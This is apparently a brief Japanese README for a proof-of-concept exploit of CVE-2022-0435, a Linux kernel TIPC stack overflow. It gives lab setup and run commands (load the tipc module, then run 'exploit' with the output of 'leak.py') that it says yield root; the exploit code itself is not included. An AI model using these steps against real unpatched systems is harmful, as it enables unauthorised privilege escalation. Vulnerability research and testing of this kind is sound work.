
CVE-2022-0435 の概念実証エクスプロイト。TIPC モジュールにおける Linux カーネルのスタックオーバーフローを悪用し、細工されたペイロードとメモリリークによりローカルの権限昇格を root に実現します。
CVE-2022-0435(スタックオーバーフロー)
wget https://releases.ubuntu.com/jammy/ubuntu-22.04.5-live-server-amd64.iso
mkdir kernel
wget http://archive.ubuntu.com/ubuntu/pool/main/o/openssl/libssl1.1_1.1.1f-1ubuntu2_amd64.deb
sudo dpkg -i *.deb
再起動して 5.13.0-051300-generic を選択
exploit.c と leak.py をロード
sudo modprobe tipc
sudo ./exploit $(sudo python3 leak.py)
root 権限を取得